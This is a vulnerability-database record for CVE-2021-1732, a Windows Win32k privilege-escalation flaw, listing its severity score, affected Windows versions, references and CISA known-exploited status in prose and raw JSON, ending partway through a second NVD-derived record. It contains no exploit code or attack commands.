cve-2021-1732

Vulnerability from cvelistv5

Published

2021-02-25 23:01

Modified

2025-02-04 18:19

Severity ?

7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C

Summary

Windows Win32k Elevation of Privilege Vulnerability

References

URL	Tags
secure@microsoft.com	http://packetstormsecurity.com/files/161880/Win32k-ConsoleControl-Offset-Confusion.html	Exploit, Third Party Advisory, VDB Entry
secure@microsoft.com	http://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html	Exploit, Third Party Advisory, VDB Entry
secure@microsoft.com	https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/161880/Win32k-ConsoleControl-Offset-Confusion.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732	Patch, Vendor Advisory

Impacted products

Vendor

Product

Version

▼

Microsoft

Windows 10 Version 1803

Version: 10.0.0   < publication
    cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*
    cpe:2.3:o:microsoft:windows_10_1803:*:*:*:*:*:*:x64:*
    cpe:2.3:o:microsoft:windows_10_1803:*:*:*:*:*:*:arm64:*

Microsoft	Windows 10 Version 1809	Version: 10.0.0 < publication cpe:2.3:o:microsoft:windows_10_1809:::::::x86:* cpe:2.3:o:microsoft:windows_10_1809:::::::x64:* cpe:2.3:o:microsoft:windows_10_1809:::::::arm64:*
Microsoft	Windows Server 2019	Version: 10.0.0 < publication cpe:2.3:o:microsoft:windows_server_2019::::::::
Microsoft	Windows Server 2019 (Server Core installation)	Version: 10.0.0 < publication cpe:2.3:o:microsoft:windows_server_2019::::::::
Microsoft	Windows 10 Version 1909	Version: 10.0.0 < publication cpe:2.3:o:microsoft:windows_10_1909:::::::x86:* cpe:2.3:o:microsoft:windows_10_1909:::::::x64:* cpe:2.3:o:microsoft:windows_10_1809:::::::x64:*
Microsoft	Windows Server, version 1909 (Server Core installation)	Version: 10.0.0 < publication cpe:2.3:o:microsoft:windows_server_1909::::::::
Microsoft	Windows 10 Version 2004	Version: 10.0.0 < publication cpe:2.3:o:microsoft:windows_10_1809:::::::x64:*
Microsoft	Windows Server version 2004	Version: 10.0.0 < publication cpe:2.3:o:microsoft:windows_server_2004::::::::
Microsoft	Windows 10 Version 20H2	Version: 10.0.0 < publication cpe:2.3:o:microsoft:windows_10_20H2:::::::x86:* cpe:2.3:o:microsoft:windows_10_20H2:::::::arm64:*
Microsoft	Windows Server version 20H2	Version: 10.0.0 < publication cpe:2.3:o:microsoft:windows_server_20H2::::::::

CISA Known exploited vulnerability

Data from the Known Exploited Vulnerabilities Catalog

Date added: 2021-11-03

Due date: 2021-11-17

Required action: Apply updates per vendor instructions.

Used in ransomware: Known

Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-1732

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T16:18:11.548Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/161880/Win32k-ConsoleControl-Offset-Confusion.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2021-1732",
                "options": [
                  {
                    "Exploitation": "active"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-02-04T18:19:15.742908Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          },
          {
            "other": {
              "content": {
                "dateAdded": "2021-11-03",
                "reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2021-1732"
              },
              "type": "kev"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-787",
                "description": "CWE-787 Out-of-bounds Write",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-02-04T18:19:33.383Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "cpes": [
            "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*",
            "cpe:2.3:o:microsoft:windows_10_1803:*:*:*:*:*:*:x64:*",
            "cpe:2.3:o:microsoft:windows_10_1803:*:*:*:*:*:*:arm64:*"
          ],
          "platforms": [
            "32-bit Systems",
            "x64-based Systems",
            "ARM64-based Systems"
          ],
          "product": "Windows 10 Version 1803",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "publication",
              "status": "affected",
              "version": "10.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*",
            "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*",
            "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:arm64:*"
          ],
          "platforms": [
            "32-bit Systems",
            "x64-based Systems",
            "ARM64-based Systems"
          ],
          "product": "Windows 10 Version 1809",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "publication",
              "status": "affected",
              "version": "10.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "x64-based Systems"
          ],
          "product": "Windows Server 2019",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "publication",
              "status": "affected",
              "version": "10.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "x64-based Systems"
          ],
          "product": "Windows Server 2019 (Server Core installation)",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "publication",
              "status": "affected",
              "version": "10.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:o:microsoft:windows_10_1909:*:*:*:*:*:*:x86:*",
            "cpe:2.3:o:microsoft:windows_10_1909:*:*:*:*:*:*:x64:*",
            "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*"
          ],
          "platforms": [
            "32-bit Systems",
            "x64-based Systems",
            "ARM64-based Systems"
          ],
          "product": "Windows 10 Version 1909",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "publication",
              "status": "affected",
              "version": "10.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:o:microsoft:windows_server_1909:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "x64-based Systems"
          ],
          "product": "Windows Server, version 1909 (Server Core installation)",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "publication",
              "status": "affected",
              "version": "10.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*"
          ],
          "platforms": [
            "32-bit Systems",
            "ARM64-based Systems",
            "x64-based Systems"
          ],
          "product": "Windows 10 Version 2004",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "publication",
              "status": "affected",
              "version": "10.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:o:microsoft:windows_server_2004:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "x64-based Systems"
          ],
          "product": "Windows Server version 2004",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "publication",
              "status": "affected",
              "version": "10.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:o:microsoft:windows_10_20H2:*:*:*:*:*:*:x86:*",
            "cpe:2.3:o:microsoft:windows_10_20H2:*:*:*:*:*:*:arm64:*"
          ],
          "platforms": [
            "32-bit Systems",
            "ARM64-based Systems"
          ],
          "product": "Windows 10 Version 20H2",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "publication",
              "status": "affected",
              "version": "10.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:o:microsoft:windows_server_20H2:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "x64-based Systems"
          ],
          "product": "Windows Server version 20H2",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "publication",
              "status": "affected",
              "version": "10.0.0",
              "versionType": "custom"
            }
          ]
        }
      ],
      "datePublic": "2021-02-09T08:00:00.000Z",
      "descriptions": [
        {
          "lang": "en-US",
          "value": "Windows Win32k Elevation of Privilege Vulnerability"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en-US",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Elevation of Privilege",
              "lang": "en-US",
              "type": "Impact"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-12-29T22:33:19.772Z",
        "orgId": "f38d906d-7342-40ea-92c1-6c4a2c6478c8",
        "shortName": "microsoft"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/161880/Win32k-ConsoleControl-Offset-Confusion.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html"
        }
      ],
      "title": "Windows Win32k Elevation of Privilege Vulnerability"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "f38d906d-7342-40ea-92c1-6c4a2c6478c8",
    "assignerShortName": "microsoft",
    "cveId": "CVE-2021-1732",
    "datePublished": "2021-02-25T23:01:31.000Z",
    "dateReserved": "2020-12-02T00:00:00.000Z",
    "dateUpdated": "2025-02-04T18:19:33.383Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "cisa_known_exploited": {
      "cveID": "CVE-2021-1732",
      "cwes": "[\"CWE-787\"]",
      "dateAdded": "2021-11-03",
      "dueDate": "2021-11-17",
      "knownRansomwareCampaignUse": "Known",
      "notes": "https://nvd.nist.gov/vuln/detail/CVE-2021-1732",
      "product": "Win32k",
      "requiredAction": "Apply updates per vendor instructions.",
      "shortDescription": "Microsoft Win32k contains an unspecified vulnerability that allows for privilege escalation.",
      "vendorProject": "Microsoft",
      "vulnerabilityName": "Microsoft Win32k Privilege Escalation Vulnerability"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2021-1732\",\"sourceIdentifier\":\"secure@microsoft.com\",\"published\":\"2021-02-25T23:15:13.930\",\"lastModified\":\"2025-02-11T16:58:39.687\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Windows Win32k Elevation of Privilege Vulnerability\"},{\"lang\":\"es\",\"value\":\"Una Vulnerabilidad de Elevaci\u00f3n de Privilegios de Win32k de Windows. Este ID de CVE es diferente de CVE-2021-1698\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"secure@microsoft.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:L/AC:L/Au:N/C:P/I:P/A:P\",\"baseScore\":4.6,\"accessVector\":\"LOCAL\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":3.9,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"cisaExploitAdd\":\"2021-11-03\",\"cisaActionDue\":\"2021-11-17\",\"cisaRequiredAction\":\"Apply updates per vendor instructions.\",\"cisaVulnerabilityName\":\"Microsoft Win32k Privilege Escalation Vulnerability\",\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-787\"}]},{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-787\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:microsoft:windows_10_1803:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"00345596-E9E0-4096-8DC6-0212F4747A13\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2E332666-2E03-468E-BC30-299816D6E8ED\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:microsoft:windows_10_1909:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A1B570A8-ED1A-46B6-B8AB-064445F8FC4C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:microsoft:windows_10_2004:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D4DBE5B2-AE10-4251-BCDA-DC5EDEE6EE67\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:microsoft:windows_10_20h2:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"6AFD13A6-A390-4400-9029-2F4058CA17E2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:microsoft:windows_server_1909:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"ADE7E7B1-64AC-4986-A50B-0918A42C05BB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:microsoft:windows_server_2004:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"62224791-644C-4D1F-AD77-56B16CF27630\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DB79EE26-FC32-417D-A49C-A1A63165A968\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:microsoft:windows_server_20h2:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"84F9B6B1-4FEE-4D4B-B35F-B07822CCD669\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/161880/Win32k-ConsoleControl-Offset-Confusion.html\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Patch\",\"Vendor Advisory\"]},{\"url\":\"http://packetstormsecurity.com/files/161880/Win32k-ConsoleControl-Offset-Confusion.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"http://packetstormsecurity.com/files/161880/Win32k-ConsoleControl-Offset-Confusion.html\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"http://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-03T16:18:11.548Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2021-1732\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"active\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-02-04T18:19:15.742908Z\"}}}, {\"other\": {\"type\": \"kev\", \"content\": {\"dateAdded\": \"2021-11-03\", \"reference\": \"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2021-1732\"}}}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-787\", \"description\": \"CWE-787 Out-of-bounds Write\"}]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-02-04T18:19:28.206Z\"}}], \"cna\": {\"title\": \"Windows Win32k Elevation of Privilege Vulnerability\", \"metrics\": [{\"format\": \"CVSS\", \"cvssV3_1\": {\"version\": \"3.1\", \"baseScore\": 7.8, \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C\"}, \"scenarios\": [{\"lang\": \"en-US\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"cpes\": [\"cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*\", \"cpe:2.3:o:microsoft:windows_10_1803:*:*:*:*:*:*:x64:*\", \"cpe:2.3:o:microsoft:windows_10_1803:*:*:*:*:*:*:arm64:*\"], \"vendor\": \"Microsoft\", \"product\": \"Windows 10 Version 1803\", \"versions\": [{\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"publication\", \"versionType\": \"custom\"}], \"platforms\": [\"32-bit Systems\", \"x64-based Systems\", \"ARM64-based Systems\"]}, {\"cpes\": [\"cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*\", \"cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*\", \"cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:arm64:*\"], \"vendor\": \"Microsoft\", \"product\": \"Windows 10 Version 1809\", \"versions\": [{\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"publication\", \"versionType\": \"custom\"}], \"platforms\": [\"32-bit Systems\", \"x64-based Systems\", \"ARM64-based Systems\"]}, {\"cpes\": [\"cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*\"], \"vendor\": \"Microsoft\", \"product\": \"Windows Server 2019\", \"versions\": [{\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"publication\", \"versionType\": \"custom\"}], \"platforms\": [\"x64-based Systems\"]}, {\"cpes\": [\"cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*\"], \"vendor\": \"Microsoft\", \"product\": \"Windows Server 2019 (Server Core installation)\", \"versions\": [{\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"publication\", \"versionType\": \"custom\"}], \"platforms\": [\"x64-based Systems\"]}, {\"cpes\": [\"cpe:2.3:o:microsoft:windows_10_1909:*:*:*:*:*:*:x86:*\", \"cpe:2.3:o:microsoft:windows_10_1909:*:*:*:*:*:*:x64:*\", \"cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*\"], \"vendor\": \"Microsoft\", \"product\": \"Windows 10 Version 1909\", \"versions\": [{\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"publication\", \"versionType\": \"custom\"}], \"platforms\": [\"32-bit Systems\", \"x64-based Systems\", \"ARM64-based Systems\"]}, {\"cpes\": [\"cpe:2.3:o:microsoft:windows_server_1909:*:*:*:*:*:*:*:*\"], \"vendor\": \"Microsoft\", \"product\": \"Windows Server, version 1909 (Server Core installation)\", \"versions\": [{\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"publication\", \"versionType\": \"custom\"}], \"platforms\": [\"x64-based Systems\"]}, {\"cpes\": [\"cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*\"], \"vendor\": \"Microsoft\", \"product\": \"Windows 10 Version 2004\", \"versions\": [{\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"publication\", \"versionType\": \"custom\"}], \"platforms\": [\"32-bit Systems\", \"ARM64-based Systems\", \"x64-based Systems\"]}, {\"cpes\": [\"cpe:2.3:o:microsoft:windows_server_2004:*:*:*:*:*:*:*:*\"], \"vendor\": \"Microsoft\", \"product\": \"Windows Server version 2004\", \"versions\": [{\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"publication\", \"versionType\": \"custom\"}], \"platforms\": [\"x64-based Systems\"]}, {\"cpes\": [\"cpe:2.3:o:microsoft:windows_10_20H2:*:*:*:*:*:*:x86:*\", \"cpe:2.3:o:microsoft:windows_10_20H2:*:*:*:*:*:*:arm64:*\"], \"vendor\": \"Microsoft\", \"product\": \"Windows 10 Version 20H2\", \"versions\": [{\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"publication\", \"versionType\": \"custom\"}], \"platforms\": [\"32-bit Systems\", \"ARM64-based Systems\"]}, {\"cpes\": [\"cpe:2.3:o:microsoft:windows_server_20H2:*:*:*:*:*:*:*:*\"], \"vendor\": \"Microsoft\", \"product\": \"Windows Server version 20H2\", \"versions\": [{\"status\": \"affected\", \"version\": \"10.0.0\", \"lessThan\": \"publication\", \"versionType\": \"custom\"}], \"platforms\": [\"x64-based Systems\"]}], \"datePublic\": \"2021-02-09T08:00:00.000Z\", \"references\": [{\"url\": \"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"http://packetstormsecurity.com/files/161880/Win32k-ConsoleControl-Offset-Confusion.html\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"http://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en-US\", \"value\": \"Windows Win32k Elevation of Privilege Vulnerability\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en-US\", \"type\": \"Impact\", \"description\": \"Elevation of Privilege\"}]}], \"providerMetadata\": {\"orgId\": \"f38d906d-7342-40ea-92c1-6c4a2c6478c8\", \"shortName\": \"microsoft\", \"dateUpdated\": \"2023-12-29T22:33:19.772Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2021-1732\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-02-04T18:19:33.383Z\", \"dateReserved\": \"2020-12-02T00:00:00.000Z\", \"assignerOrgId\": \"f38d906d-7342-40ea-92c1-6c4a2c6478c8\", \"datePublished\": \"2021-02-25T23:01:31.000Z\", \"assignerShortName\": \"microsoft\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

fkie_cve-2021-1732

Vulnerability from fkie_nvd

Published

2021-02-25 23:15

Modified

2025-02-11 16:58

Severity ?

7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

Windows Win32k Elevation of Privilege Vulnerability

References

URL	Tags
secure@microsoft.com	http://packetstormsecurity.com/files/161880/Win32k-ConsoleControl-Offset-Confusion.html	Exploit, Third Party Advisory, VDB Entry
secure@microsoft.com	http://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html	Exploit, Third Party Advisory, VDB Entry
secure@microsoft.com	https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/161880/Win32k-ConsoleControl-Offset-Confusion.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/166169/Win32k-ConsoleControl-Offset-Confusion-Privilege-Escalation.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732	Patch, Vendor Advisory

Impacted products

Vendor	Product	Version
microsoft	windows_10_1803	-
microsoft	windows_10_1809	-
microsoft	windows_10_1909	-
microsoft	windows_10_2004	-
microsoft	windows_10_20h2	-
microsoft	windows_server_1909	-
microsoft	windows_server_2004	-
microsoft	windows_server_2019	-
microsoft	windows_server_20h2	-

JSON

To clipboard

{
  "cisaActionDue": "2021-11-17",
  "cisaExploitAdd": "2021-11-03",
  "cisaRequiredAction": "Apply updates per vendor instructions.",
  "cisaVulnerabilityName": "Microsoft Win32k Privilege Escalation Vulnerability",
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:microsoft:windows_10_1803:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "00345596-E9E0-4096-8DC6-0212F4747A13",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E332666-2E03-468E-BC30-299816D6E8ED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:microsoft:windows_10_1909:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "A1B570A8-ED1A-46B6-B8AB-064445F8FC4C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:microsoft:windows_10_2004:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "D4DBE5B2-AE10-4251-BCDA-DC5EDEE6EE67",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:microsoft:windows_10_20h2:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "6AFD13A6-A390-4400-9029-2F4058CA17E2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:microsoft:windows_server_1909:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "ADE7E7B1-64AC-4986-A50B-0918A42C05BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:microsoft:windows_server_2004:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "62224791-644C-4D1F-AD77-56B16CF27630",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*",
